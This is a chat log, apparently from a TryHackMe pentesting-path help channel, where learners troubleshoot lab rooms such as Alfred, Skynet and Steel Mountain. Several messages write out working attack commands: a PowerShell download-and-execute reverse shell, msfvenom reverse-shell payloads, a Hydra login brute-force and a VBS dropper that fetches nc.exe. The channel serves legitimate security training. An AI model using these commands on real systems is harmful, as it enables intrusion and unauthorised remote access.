at least I got the user.txt flag
true
that is where I am having difficulties
dang, you cant get nothing to work XD
wow!
I am facing the problem in two rooms. There is a question that I am sure of the answer to, but when I answer it, it says "uh-oh undefined"
Does anyone know a solution to this problem?
Please do not ask the same question over multiple channels
ok , sorry about that
Was doing the Retro room and did everything as I was supposed to do, but when I'm finally opening the cmd.exe and typing whoami, I'm still getting retroweb/wade
Any hint/help would be highly appreciated
Can you explain what you did in what order?
After I gained the user flag, I restored the HHUPD.exe, couldn't open the certificate url directly so wrote it manually in IE and tried to save the file and navigated to cmd.exe
Then how can I open the url from that link?
You don't need to actually load the page
It's opening the browser
The browser is running as System, that's the vulnerability
Okay got it. I'm trying as you said
That is the problem, it isn't opening the browser
I'll show you
Here I'm not able to click on any of the options
This is part of the challenge
I guess it was a bug or something, after trying for 2-3 times, I was able to open it in IE from there only and got the root flag.
Thanks @keen iris 😄
Hey so I tried to add a user on my own vm (used adduser command) but it gives me a weird shell similar to a rlwrap shell. Does anyone know how to make it a normal shell?
@willow cove what is the command you used to add the user?
sounds like you didn't add the -s flag
adduser
yes, the full command
sudo -s
adduser rhine
passwd .... rhine
su rhine
I'm trying to upload a picture of it rn
ahh let me try that
@willow cove adduser -m -G <groupstoadd> -s /bin/bash username is how I generally do it
adduser -m -G users -s /bin/bash newuser
you can change /bin/bash to /bin/sh or whatever your shell of choice
Which distro are you using?
Kali?
yes
a user account
sudo useradd [username] is the base command
man useradd for full list of options
-s allows you to define a non default shell, shouldn't need to specify one in a world that makes sense
I tried useradd -d /home/rhine -s /usr/bin/zsh rhine
and the shell it spawned was kali%
instead of ┌──(root💀kali)-[/home/kali]
└─#
although the up and down arrow work
I also tried not specifying a shell and that starts with $
if you have been having any trouble accessing localhost:8080 after a docker network validation let me know, been having trouble with that. I plan to further investigate this unknown connection issue later today.
hi everyone, I just started this path and I got stuck in the privesc for task 5 under vulnversity. I need help. I will attach screenshots here. It's something to do with the nc command causing an error on the target system
this is what I have tried so far; I changed the command options but still got the same error
is that from running sudo /bin/journalctl?
i remember one of those privesc involved that
nope just bin/systemctl
which gtfobin are you trying?
oh...nevermind i see permission denied
from your nc shell, did you upgrade it? I don't believe you can sudo anything from standard netcat
oh I didn't sudo it, just used the script from gtfobins for suid
couldn't upgrade without sudo on target machine
upgrade your shell not your account
that whole python3 -c 'import pty;pty.spawn("/bin/bash")'
theres more to it
but I don't think a standard netcat session can sudo, you need a tty
and take what i am saying with a grain of salt
ok, i will try upgrading the shell. right now i'm open to all options
oh this one, yeah i had to do that gtfobin quite a few times before i got it right
you are obviously not going to do the 1st line of it as systemctl is already installed
@elfin plaza this is an excellent room for learning about shells, reverse shells, how to stabilise etc: https://tryhackme.com/room/introtoshells
thanks a lot, i will check this out.
Gave +1 Rep to @tight nymph
Figured it out finally. I should remind myself never to make it so complicated next time 😓
@elfin plaza awesome, what was the issue?
I had to not use nc cos like you said, without sudo I wouldn't be able to get it to work on the target machine, but I could still use the gtfobins idea to get access to root.txt using a different command in place of nc to read the file
Just wondering, how far will this pathway get you? Would you be ready for bug bounties and advanced CTFs by the end of it?
@elfin plaza oh cool so you got it doing a different method? thats awesome, finding unintended pathways is always cool 🙂
Probably just copied the root.txt to /tmp or some other directory that’s accessible to a non-root user
If you’re struggling to get a reverse shell, you can always try and put that command in a bash script and get the service to execute that
Also, if one reverse shell script doesn’t work, the python one is pretty reliable as well
Yeah, that’s exactly what I did. Figured using the sample script from gtfobins, if I could set the id of the output to root then it means I can execute other commands normally done with root privileges
glad to hear you figured it out, and by not blindly copy/pasting, figured out how to make it work for you. That's probably the hardest part of cybersecurity and maybe IT in general: figuring out how to make someone else's code work for you
no points for grats so here's a thanks @elfin plaza
Gave +1 Rep to @elfin plaza
hi guys
need help with Apache Tomcat 7.0.8 JSP Upload Bypass Remote Code Execution
don't quite understand
anyone can help?
Hey, people. Got stuck in 'Retro'. After finding the user's password, I can't access RDP with it or get any EoP with the reverse shell dropped. Does anyone have tips?
If you have the right credentials, RDP should be accessible. Privesc is possible via rev shell as well, you'll just have to enumerate some more.
There is more than one way to root that box.
447l90k*/-k m-+
hey guys, I've got stuck in the overpass2 room. In the part where you get a hash and a salt and have to crack it, I can't seem to get the password using johntheripper even when trying all of the formats it suggested
Thanks!
the last 2 rooms in the Advanced Exploitation module are pretty cool, nice work on them 🙂
Is it common that a fully interactive reverse shell is laggier than the initial unstable shell? Can't determine if I need to upgrade my network connection, or if it's a fully interactive shell thing, or if it's a vpn thing.
What do you mean by laggy?
laggy as in keypresses are delayed
Noticed a pattern of having to wait 4 minutes or so for keypresses to appear, then I'd have a half a minute of "good connection" where keypresses are about 0.3 second slow to show. Thereafter I'd have to wait another 4 minutes...
Are you having that right now, or you are not having a shell whatsoever now so we can try ?
So check ip a s on your local machine to see if you only have a tun0 interface or any extra like tun1, tun2 etc
yeap, i'm having the THM VPN
Okay, but the question is if you have more interfaces than just tun0 🙂
i have tun0, tun1
But you are not using any other vpn than the thm one?
Then do sudo killall openvpn, then connect to the thm vpn again, after that check again with ip a s to see if you now only have a tun0 interface and not any extra like tun1, tun2 etc. anymore
After you fixed that, reconnect to that target machine and check if the issue with the shell is solved
i have tun0 only now
But make sure you reconnect
Ye, but I guess you got disconnected from the target machines anyways after you killed openvpn. So you should be fine.
i didnt actually.
In case the issue comes back while you are sure that you only have a tun0 interface, write it in #site-support
so it was the double vpn connection that was causing issues
if i have weirdly formatted text is that also due to the double vpn issue?
weirdly formatted as in, weird characters popping up as i type or typing over characters
I'm not sure, but I don't think so.
thats a tty issue?
Maybe, not sure. You might want to verify in order to be able to send screenshots, so you can post a screen of that.
!docs verify
don't have it now. maybe next time
working on the room "Overpass2 - Hacked". Following the walkthrough (https://infosecwriteups.com/tryhackme-overpass-2-hacked-walkthrough-351daeaeca89), at the last task, the author executed a binary .suid_bash which gives you a root shell. That seems like a rather dangerous move, running an unknown binary. Is that common practice? is there a better way to do it? Perhaps some checks I can run or so
It's being run on the target machine
So the risk to you is basically 0, certainly no more than SSHing in
that part I get, would it be common to do so in a CTF or even in real pentesting?
You'd commonly live off the land in a pentest, with what programs you've got.
In a CTF you'd usually reverse engineer the program if you don't trust it. Or an isolated environment for debugging etc, like malware RE
(also you can take a checksum of that binary, it's literally just the standard bash binary that's on the box but with suid added)
that makes sense.
Hi,
is there anyone here who can help with mona in the bufferoverflowprep module?
It seems to me that mona's compare isn't working very well and the only technique that works is to look on my own on the stack to see the bad characters.
Maybe I miss something regarding mona.
You can PM me if you still need help
Has anyone accessed the HackPark room on this path lately? It appears to be down for me.
It doesn't respond to pings.
Doesn't mean it's down
All good it responds now, it was not opening any webpage for some time.
it takes a bit longer to fully set up
for the Overpass 2 - Hacked room, while going through https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go , I didn't understand that well what exactly is being done in the code. I would really appreciate if someone can point to mandatory pre-requisites and could answer:
- what's the role of default hash and a hardcoded salt in the code?
- why the attacker needs to pass the hash while running the backdoor executable?
I guess it has to do something with ssh connection but things aren't clear.
what's the role of default hash and a hardcoded salt in the code? Default is what it sounds like. It's the default, if you don't specify one.
- Because that's how the program works...
It uses the SSH protocol, but is not the same as SSH as you know it. It's not an OpenSSH or Dropbear server. It uses the SSH protocol to communicate, not to provide the shell.
thanks for a quick response but I need to be more specific in my questions
- why does the backdoor code need a hash and a salt?
the answer to it may be very basic but I am not getting it
Because storing passwords in plaintext is bad practice
And it is a part of the challenge.
It also means the password is not transmitted in plaintext
Alright, would you also explain technically what exactly the backdoor executable does
It's an authenticated backdoor that uses the SSH protocol to encrypt communications
and how does it benefit the attacker exactly
It's easy return access? Persists across a defender changing a password? It's a backdoor...
alright! seems like I really need to get familiar how the backdoors actually work. Anyways thanks a lot for your assistance.🙏
pls, in the terminator room, why when I bruteforce the squirrelmail with the credentials I've found on the smb share are there so many false positives?
here's the command and output
that ^LOGIN^ should be ^USER^ i believe
same result with USER
this is skynet? give me a sec, I will give you the hydra command I used for this room
hydra -l milesdyson -P files/log1.txt -u 10.10.67.48 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown" -f -V
the files/log1.txt is a file I obtained from smb
@fleet wedge can you add me real quick, I have a private question
the pass.txt file you are using, is it a file you got from the skynet box or something else?
its the log1.txt
im trying some things
the command I posted above then, that yielded me a password from that log1.txt
Sure?
ok so it apparently works with the "-f" flag
hrm? in hydra, -f means to stop running on the 1st success
I have a guess but I'm not sure why it works
I always did -f and -V (stop on 1st hit, and verbosity). Does it fail (as in keep going) without the -f?
I guess after the successful attempt it starts doing some obscure stuff and thinks every password is right
but maybe i'm wrong
anyway thanks
Gave +1 Rep to @tight nymph
Has anyone done the buffer overflow prep room?
Could I get some help with the Relevant room? I'm looking at the walkthroughs, but nothing was mentioned about how they arrived at the conclusion to use the PrintSpoofer exploit. I ran winPEAS, and it did not show up. Would like to know what else I could do to supplement the results from winPEAS.
I believe, the assumption was based on user having SeImpersonatePrivilege privilege. There are two vectors associated with its abuse: Juicy Potato and Print Spoofer. However, I didn't find the Print Spoofer while googling 😦 Also finished the room thanks to walkthrough.
Gave +1 Rep to @tame ivy
That's a little bit disappointing
@tame ivy @frail gyro I attributed my lack of Windows knowledge to how long this one took me. Getting onto the box was easy enough and I knew the ||SeImpersonatePrivilege|| was somehow meaningful, but I only had experience using that privesc with tokens. After 1-2 hours of googling I did find this: ||https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/|| and the matching github page for the ||PrintSpoofer|| which helped me understand the privesc better as well as solve the room.
hey guys anybody did alfred room >?
yes?
please no DM, ask your question here
yes, I recall the powershell command (I actually took notes for this one)
oh ok, I did not want to spoil
"GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 404 -
I keep on getting this every time I try; the shell does not want to connect
If you follow those steps, you'll be allowed to send images.
C:\Program Files (x86)\Jenkins\workspace\test>powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.244.113:85/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.244.113 -Port 9001
Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At line:1 char:46
+ iex (New-Object Net.WebClient).DownloadString <<<< ('http://10.10.244.113:85/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.244.113 -Port 9001
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException
The term 'Invoke-PowerShellTcp' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:119
+ iex (New-Object Net.WebClient).DownloadString('http://10.10.244.113:85/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.244.113 -Port 9001
    + CategoryInfo          : ObjectNotFound: (Invoke-PowerShellTcp:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
this is what I get on the console output on jenkins
Is the Invoke-PowerShellTcp.ps1 script in your current directory when you host the webserver?
Sounds like it isn't, given the 404 on your webserver. Check again, make sure it's all typed correctly too.
Thank you, accidentally forgot tcp
Hi guys, I've recently started using TryHackMe, and I am not too familiar with Linux, so I am having a little problem on the second problem, on
Vulnversity, Task 2, when we have to use nmap. I deployed a machine, used nmap, and after quite a long time I got the scan back, found some of the answers, but I didn't find the squid proxy. I've checked my commands, I've created a new Attack Box, restarted it, switched browsers, turned the VPN on and off; this was my 8th try, everything is right, but I am not getting the correct output as I was supposed to be getting. Instead I keep getting a 405 on a GET request. I really want to solve this but not sure what to do here.
That means you're using the IP of the attackbox, not the IP of the target.
Oh wow, I spent so much time on this to be that, well guess I will learn lol. Thank you James.
Gave +1 Rep to @keen iris
Could you help me please! I am new to buffer overflows. I started the BufferOverflows Task 7, Overwriting Function Pointers. I could find the return address of the special function and I could write it in little endian format as hex, but I don't know what command I have to use to call the special function.
but I can't know what command I have to use to call the special function. Huh?
You need to overflow the buffer to overwrite the return pointer on the stack?
Please anyone here help me how to download a file on github to a server
i tried wget and it shows dns resolve issues
Is this related to a tryhackme room?
This channel is for the TryHackMe offensive pentesting path
I know, hence the question, it's fine if i don't get the answer
You're asking in the wrong place
After I run gdb -q func-pointer and the run command, I use AAAAAAAAAAAAAA'specific function starting hex number in 6 bytes little endian' but I get back "Program received signal SIGSEGV, Segmentation fault." as the answer.
Is that enough bytes to overwrite the function pointer?
Do you know what you're overwriting it with?
Yes it is enough, because the buffer size is 14. I get 0x0000000000400041 with A15 and 0x0000414141414141 with A20; from this my 6-byte return is '\x67\x05\x40\x00\x00\x00', which is the specific function's starting address.
You get those values where?
I ran func_pointer in gdb. After that I started to test how many characters are needed for the buffer overflow.
I used this write-up for this, but the end of this write-up is not good.
hey guys anybody here did the brainstorm room ???
Yes.
Hi, Is there any issue with Brainstorm room?
Only with the port scan results iirc? Are you having an issue?
https://bobloblaw321.wixsite.com/website/post/tryhackme-buffer-overflows
I wanted to know if you guys have an idea of how to transfer the chatserver.exe and .dll file
I've been trying to do it on the tryhackme attackbox, as trying to install Immunity dbg on my kali box gave me issues
Absolute most common issue is downloading the files in binary mode
Hello, I've tried to use gobuster along the path and I think I see what it does, but I'm not understanding what the purpose is of sending a list of words to find directories. I guess the purpose of gobuster is to find dirs or files, but I don't know how gobuster does it and what the purpose of the wordlist is.
can someone explain it to me? I didn't find anything clear about it. I'll be grateful if you can, I'm a bit lost ^^'
Hi @graceful lagoon !
I recommend doing this room: https://tryhackme.com/room/contentdiscovery
okay thanks !
Gave +1 Rep to @brisk maple
Yes and with the services as well. Connection Time Out Error.
Hello guys, I need some help for the Alfred room. If I follow the steps I can't get a meterpreter shell with the payload generated with msfvenom.
I don't understand why
Can you tell us what you're doing?
Preferably with screenshots
I generate a payload with : msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=myIP LPORT=4444 -f exe -o rshell.exe
After that I upload it via Jenkins with : powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
And then I execute it with : powershell Start-Process 'rshell.exe'
Ok, try it from the powershell reverse shell you got earlier.
Also make sure you set your payload and LHOST correctly in your msf handler
I did and it works but I don't get a meterpreter session (which is needed for the steps after)
This.
Oh I see what you mean
I triple checked it's good but I will try to execute the shell from the powershell session
Ok it works when I execute the payload from the powershell session 🙂 thanks (should have tried it earlier)
Gave +1 Rep to @keen iris
I can't tell you why, at a guess it's something to do with long running commands?
I was starting my learning path and in vulnversity there is a task to do nmap port scanning. However, there isn't a target machine IP provided, so I assumed it should be the same as in the deploy machine task. I did an nmap scan (nmap -p- -T4 target_ip) and found that there are 2 ports open (22 and 80), but that isn't the correct answer? What on earth is happening?
Solved it meanwhile ?
nope
Is the target machine still up ?
not anymore. I reached timelimit so have to try again tomorrow
I had the same issue yesterday
Okay, ye then get back here in case the next time you try it's not working again
Anyone free here to give me a nudge on relevant, maybe less of a nudge and more just confirmation that I am going down the right path here as I have been stuck for a while.
I have a question regarding windows privilege escalation and will appreciate any help-
When it comes to potato exploits, I found out that in order to run any potato exploits, DCOM must be disabled on the target Windows machine. Is there a powershell command to check the DCOM status?.... I found a way, however it required GUI access and going to regedit and checking the registry value
You can query the registry with powershell
oh yes
Hello, I have questions for https://tryhackme.com/room/bufferoverflowprep OVERFLOW4.
- Upon practicing this task I've got the different (two additional) invalid numbers (\x), which did not meet the room answer but resulted in successful reverse shell in further steps (triple checked the prefix = "OVERFLOW4 "). As I do not have the deep knowledge - is it possible in the real life scenario to have different sets of invalid bytearrays for the same jump point?
- msfvenom generates a python2 payload which is not out of the box compatible with python3 (cannot add bytes to string). Is there an option in msfvenom to generate the python3 version of the payload? At the moment my current syntax is:
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "<invalid bytes>" -f py -v payload
then I do find and replace += b" > += "
Room: https://tryhackme.com/room/blue task 1.
I've enumerated the target but OS detection fails. How do I establish what the machine is vulnerable to? I can see SMB is running and that according to nmap service detection it's SMBv1. I've tried the exploit DB for SMB exploits and there's a lot of them. What's the process of whittling the list down?
Hi everyone! I'm in the Post Exploitation Basics room on task 2 for this pathway. Not sure if I am missing a trick here, but I'm having some trouble running the cmdlets listed in the room for Powershell after executing ./PowerView.ps1. When I run "Get-NetUser | select cn" or other commands after this step, the terminal returns a message stating the cmdlet is not recognised
Dot space dot backslash to import
Thanks @keen iris ! I certainly did miss the trick haha! 👍 😆
Gave +1 Rep to @keen iris
Hey! I have an issue with ftp on Brainstorm. Once I'm logged in, I type ls or dir and I get this error "229 Entering Extended Passive Mode (|||49337|)" and I can't do anything more, basically. I am using Kali 2021.3 fully updated and upgraded. Anyone know a workaround? Thanks!
Solved by typing "passive"! Have a good day, hackers!
I think I have a very simple question but cannot find the answer… I have a reverse shell with msfconsole and want to open a new session… how to do that (and keep the current reverse shell open)?
Sort of like ctrl-z and then bg
sessions 1 did the trick.
Hello, I have a problem with the "Blue" challenge, Task 4: the "hashdump" command takes too much time and it doesn't work. Can anyone help me please?
Having some issues with the Brainstorm lab when testing the Buffer Overflow locally. I am using Immunity Debugger on a Windows 7 local virtual machine which runs chatserver.exe perfectly well, but when I am trying to exploit the executable the buffer overflow offset keeps varying for unknown reasons. I am getting values between 3000 - 3500 when I know that on the TryHackMe target machine the offset actually lies in the 2000 area.
Does anyone have any suggestions to help make my local VM borderline identical to the one used by TryHackMe? I am unsure if I have additional security functions in place on the Windows VM that are causing potential issues with this lab.
Any suggestions are really appreciated!
What is the other way to find out about the internal ip:port in the box Internal if there wasn't any Jenkins.txt file to tell us?
Solution for those who have same problem: for some reason the first time disabling ASLR did not work but repeating this step and disabling ASLR globally in the registry stopped the address space from sliding around and fixed the offset at the required location.
The room HackPark is kinda outdated now, particularly with the windows-exploit-suggester. The repo of that tool is very outdated (5+ years without a single commit) and the installation has to be done with Python 2. I would suggest adding a little change (if the owner of the room doesn't want to update the whole room itself) so that the new suggested tool is https://github.com/bitsadmin/wesng, a much more recent version of the windows-exploit-suggester.
Hey guys. Anybody know how long it takes for the kenobi room to start working?
Hello, did you solve the issue?
Could someone explain what the difference is between msfvenom -p windows/shell/reverse_tcp and msfvenom -p windows/x64/shell_reverse_tcp, and why does the second work but not the first?
(Relevant room)
One's staged, one's stageless.
One's 64-bit, one's 32.
okay, I don't really know what staged/stageless means I'll look it up, thanks
I thought 32-bit stuff was compatible with 64-bit though.
Should be, I can't find much on it though
that must just be the staged part that doesn't work
anyway thanks for making me discover this
Just using winPEAS.bat and piping the output to a text file to look through on my host. I'm getting strange characters (e.g. <0x1b>[33m[+]<0x1b>) in place of color. I'm assuming these are colour controls but they aren't displaying as such in vim or Sublime. Any ideas?
Hi. No, nmap wasn't able to reliably identify the host. Take a look at the services running and then use specific nmap enumeration scripts against them. This will help you work out what the system is vulnerable to.
||https://www.infosecademy.com/nmap-smb-scripts-enumeration/||
Fixed my own issue. Install ANSIescape in Sublime and set the syntax to ANSI. All working now
Hi everyone! I'm going through the Windows Privesc room (I hope this is not the wrong channel) and I noticed there are a few services exploited through weak permissions and such. My question is, how do you identify a vulnerable service? Do you just list all of the services, go through each and query the service config?
You learn what to look for.
You look for versions, configuration, you poke around.
You use vulnerability scanning like nmap scripts, enumeration tools like enum4linux/smbmap, all sorts.
Enumerate, enumerate, enumerate
Hello guys, I have a question about EternalBlue (I'm on the Relevant room). I successfully used the MS17-010 exploit from Sleepya but I'm having a hard time understanding what it really does and how I can exploit it. I know there are Python scripts to get a reverse shell, but is there more to do with only Sleepya's exploit?
BTW I want to exploit it without Metasploit
In gatekeeper my exe is not opening on my lab
I tried both get and mget command to download the file
Download it in binary mode
Wait, is it downloaded over FTP?
If so, then yes. Binary mode required.
No it's from smb share.
You need a windows 7/8 virtual machine that is 32bit and has ASLR disabled along with windows defender/firewall
^^^
Is there no way to make it work on 64-bit? I can't install a new 32-bit Windows right now.
Why not just get a virtual machine up and working?
I might have got it to run on a 64-bit Windows 7 VM, but can't remember.
Have you searched the error code at all?
I did. It asked me to install .NET and the Visual C++ redistributable, and other solutions still didn't work.
Ok I found out how to execute a binary with the Sleepya code
Hey, does anybody use 403bypass?
I've gotten very comfortable with finding the offset and bad characters in the OSCP BoF box. But after that I can't get a shell. I got the shell by using a similar method in Gatekeeper but not in OSCP. Can anyone help me?
Does the OSCP BoF box have something different?
Hello, I'm getting a lot of crashes from the Relevant target machine. Is it possible that it's crashing because I'm poking at it too much, or is there a stability problem?
When running the post/multi/recon/local_exploit_suggester is it normal for it to finish with an error "Post interrupted by console user"? This is in the Metasploit room.
I assume it's possible irl, but for this room is that expected?
Well, this actually seems to happen on all post exploitation modules I try to run, so I will assume it's expected.
Hey guys, I'm working on the Attacktive Directory room. I'm trying to crack one of the Kerberos AS-REP hashes you get early on. Why is my hashcat not able to crack this hash? Is my format messed up somehow? What could be the issue here? I am using cracking mode 18200 for krb5asrep$23. This hash in the screenshot below was originally $krb5asrep$18, but I changed the 18 to 23 since I saw many walkthroughs had 23 in that spot; I thought maybe that would fix it.
I realized that I was trying to crack a Kerberos 5 AS-REP etype 18 hash, which I guess wasn't the right hash to crack; once you start the process of using impacket-GetNPUsers, it's only then that you obtain the hash that can be cracked ($krb5asrep$23). I obtained what I thought to be the crackable hash when I ran kerbrute. Still slightly confused here though: can anyone explain why one hash was cracked in a second and the other couldn't be cracked with the same wordlist?
How can we increase the speed of Metasploit brute force password attacks?
Have you done show options to check if there is something related to speed, or googled it already?
There is a range for speed 0-5 but it's still slow.
can we use GPU for this process?
Then you're probably limited to that, but you might wanna google that.
Gave +1 Rep to @dense gate
But depending on what exactly you are brute forcing, you might want to use hydra for such a task
ssh login
Ok, well I guess that's slow anyways, but trying hydra might be worth it.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-20 22:56:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
the problem is one try per task
Using the Metasploit module works, but as it's slow it's taking up a lot of time.
Which room are you doing btw?
metasploit
Which Metasploit room (there are several) and which task?
It's not a task; I am just trying different ways to bruteforce.
@clear hawk please don't ask the same question over several channels.
Please only use the path related channels for path related questions
@frigid ravine If this isn't related to a THM room, please ask your question in #general or #infosec-general
oop sry
options enough
Hi!! My 10% voucher for CompTIA PenTest+ is available to use before 31/12/2021, BUT I just finished the path on 19/01/2022!!!! Does it make any sense?
Hackers! I have an issue with Gatekeeper: while loading gatekeeper.exe into ID I get an error "VCRUNTIME140.dll reinstalling the program may fix this problem", so I redownloaded the exe file and reinstalled ID as well, but no changes. Any help? Thanks
Here on port 445, netbios-ssn is being displayed. I'd read that port 445 is used by Microsoft Directory Services for Active Directory (AD) and for the Server Message Block (SMB) protocol over TCP/IP.
SMB relies on NetBIOS for communication with devices that do not support direct hosting of SMB over TCP/IP, and this uses port 139.
So, what should I conclude? Is there something else I should know or there's something wrong with nmap's details?
Nmap service name column is a best guess based on what's commonly used on that port
Also with nothing is the reported versions are different
I don't know the context of what you're scanning so I'm just speaking generally
Not if you use -sV like they're doing. Then it'll actually do fingerprinting
Thanks for your response! I am having an issue with the info displayed in the service column only... versions aren't of concern to me here... I just need a confirmation on whether the service being displayed for port 445 is correct or not.
Gave +1 Rep to @wind tartan
Good to know, thanks 👍
Gave +1 Rep to @keen iris
What's the issue with the results?
It finds 139/445 for smb, I do not see the issue.
should I consider netbios-ssn and smb the same?
Actually, I read that NetBIOS is completely independent from SMB, and according to me port 445 should either run microsoft-ds or SMB over TCP/IP.
While SMB, which is dependent on NetBIOS for communication with devices that do not support direct hosting of SMB over TCP/IP, should run on top of NetBIOS (netbios-ssn) using only port 139 and not 445, as is being displayed in the output.
Hey all, I'm working on the Post-Exploitation room for AD. Trying to use PowerView, but most of the commands I try which are in the provided cheatsheet aren't working when I try to run them. Any advice?
The room provides its own version of PowerView and links a cheatsheet of commands to use, so I assumed the commands on the cheatsheet would work. Maybe there's just a discrepancy between versions, but I just wanted to make sure I'm not using this command incorrectly or something.
Can you show how you imported powerview?
I didn't import it at all, it was already put on the DC that is being used in this rom
room*
So that's why I'm wondering maybe there's an issue with versioning.
Before you can use the functions defined in the script, you need to import it.
What do you mean exactly? When I RDP
When I RDP'd into the machine in this room, Powerview.ps1 was already in the Downloads dir, so I assumed I could just run the commands.
By importing do you mean . .\Powerview.ps1
Making assumptions is dangerous, especially if they involve you skipping over instructions in the room
Yup I did those steps, ran the execution bypass command and then started powerview with . .\Powerview.ps1
Were you in Downloads?
is that ..\ or dot space dot backslash?
A screenshot would be much clearer
That's why I asked you to show this.
Dot space dot backslash is for import, as is Import-Module.
Ok. Make sure you're in a 64-bit PowerShell session, not an x86 one.
Gotcha, I was unaware the . .\ was 'importing'.
How can I ensure I'm in a 64-bit session?
Explicitly start one?
Alright, I'm just not exactly familiar with how to explicitly start PS sessions with a certain architecture; I have never done that before.
Not the x86 ones
I'm obviously a noob just trying to work on AD enumeration. I wasn't aware that the architecture of the shell session would affect how this tool works, so I do apologize.
Ah I see
No idea, just some docs somewhere say some commands aren't available in x86 sessions
Gave +1 Rep to @keen iris
ty for the tip, wouldn't have caught that for sure
Is that working?
Tool seems to be working better overall but the same command that didn't work above is still throwing an error. Will just have to find a workaround
Hey all, this can probably be assumed, but it's a question that came up while I was working through the Kerberos room. To properly use Rubeus, am I correct in understanding that I (as an attacker) will need to have already compromised a domain account which gives me shell access to the DC, from which I need to be able to compile and upload Rubeus to the DC?
So using Rubeus isn't likely an initial attack vector when you are first starting out on a network and looking for that first set of credentials.
Hi, can anyone share your knowledge about cyber security?
like pentesting
I am interested in learning offensive security.
You don't have to be domain admin to run Rubeus, I don't think you technically have to be even local admin though I think some things might not work if you aren't. Rubeus would be useful in pivoting and privilege escalation. By the time you use Rubeus you should already have a foothold on a target in the network. Hope that helps!
This plays into the arch types of systems. x64 is technically x86-64. It is an extension to the x86 instruction set, as it uses 64-bit registers vs. x86, which uses 32-bit. 🙂 hope that helps
Yup, that's exactly what I was thinking: Rubeus is only to be used once I have a foothold, i.e. I need some set of valid creds for ANY user.
Hello all! I'm struggling with the Gatekeeper lab. My Python script works fine with my own test of gatekeeper.exe on a Windows VM with Immunity Debugger, but the script does not work with the actual target! I'm using telnetlib instead of the usual socket library because it does not work with my tests. Any help is welcome!
So you successfully got a reverse shell when testing on your own Windows VM, but you're not able to get a reverse shell with the actual target?
Exactly. I just can't fathom why. I wonder if it's related to the VPN; that would be the only difference. To make sure, I went through the writeups and found the same offset and same EIP address.
Are you using a x86 or x64 payload?
Maybe you could share the command you used to generate your msfvenom payload
msfvenom -p windows/shell_reverse_tcp LHOST=XXXX LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c
The badchars are not these ones, but that's the command I'm using in general.
Ok, that's a 32-bit payload, so that should be good.
Hello! So today I was trying to complete the Steel Mountain box. It was smooth through the Metasploit section, but trying to get root manually I ran into an issue. Trying to run the exploit through Python, it gives me this error code. "line 37
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 2-3: truncated \UXXXXXXXX escape"
I wish that was the problem 😆 so I have to find another lead
I'd honestly recommend just following the official writeup from start to finish
should get you where you need to be
must be a missed step somewhere
Yeah, but the guy did it in Ruby, that's why I didn't do it 😕 I'll try another one online.
https://etchedshell.medium.com/try-hack-me-gatekeeper-e796edbe09da try this writeup
thanks! i'll check it out
Where can I find a complete pentesting checklist?
I managed to adapt it to python3 (which I know) and got it to work finally. Thank you for help 👍
Gave +1 Rep to @pearl citrus
no problem! glad you got it working
How do I complete Blue if it's an offline machine?
You talk about that room? https://tryhackme.com/room/blue
Correct
There is still a target machine attached to that room. It's just in case you want to, you could get the machine for offline usage as well.
So it's just optional
Okay, sounds good.
How do I crack the password in blue once I have the hash
Have you started researching that?
Yes
What's your research found?
I'm trying to use hashcat. I put the hash into a file, but I just can't figure out the command to get it to run correctly, and I don't know which options to use.
Ok, so you need to tell hashcat what format the hash is
And you need to tell it the wordlist
And provide the hash or a path to a file with the hash in
I'm using the rockyou wordlist, but I don't know what format it is.
Ok, so some research again. What format are Windows password hashes?
-m
(That question is rhetorical)
MD-4
That's not quite right.
MD-5
Nope.
LM
This question. If you enter it into google and read up about it, you'll find out.
Okay
"Windows passwords are stored in two separate one-way hashes - a LM hash required by legacy clients; and an NT hash. A windows password is stored in the LM hash using the following algorithm: The password is converted to upper case characters."
Ok, so there are two formats and one is legacy (so not so likely to be used).
NT
Verify that information for yourself, keep reading other sources. Research the NT Hash etc.
Okay
Hacking is roughly 90% research. You have to dig deep for answers, read docs, etc
Sounds good.
I figured it out.
Hello everyone, I'm stuck on the problem THM Brainstorm (BOF) Task 1: how many ports are open? I used nmap scanning and just found 3 ports. They are 22, 3389, 9999. But the answer is 6, why?
😫
@zenith fog try putting -p- in the parameters
